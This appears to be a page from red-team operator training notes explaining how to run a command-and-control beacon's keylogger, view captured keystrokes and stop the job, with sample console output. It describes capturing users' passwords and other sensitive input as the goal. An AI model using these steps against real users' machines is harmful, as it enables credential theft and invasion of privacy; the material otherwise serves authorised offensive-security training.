> For the complete documentation index, see [llms.txt](https://yamortsa.gitbook.io/rto/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://yamortsa.gitbook.io/rto/host-reconnaissance/keylogger.md).

# Keylogger

A keylogger can capture the keystrokes of a user, which is especially useful for capturing usernames, passwords and other sensitive information.

```
beacon> keylogger
[+] received keystrokes from *Untitled - Notepad by bfarmer
```

\\

All keystrokes can be seen at *View > Keystrokes*.

\\

![](https://files.cdn.thinkific.com/file_uploads/584845/images/c6d/013/c33/keylogger.png)

\\

The keylogger runs as a job that can be stopped with the `jobkill` command.

```
beacon> jobs
[*] Jobs

 JID  PID   Description
 ---  ---   -----------
 6    0     keystroke logger

beacon> jobkill 6
```
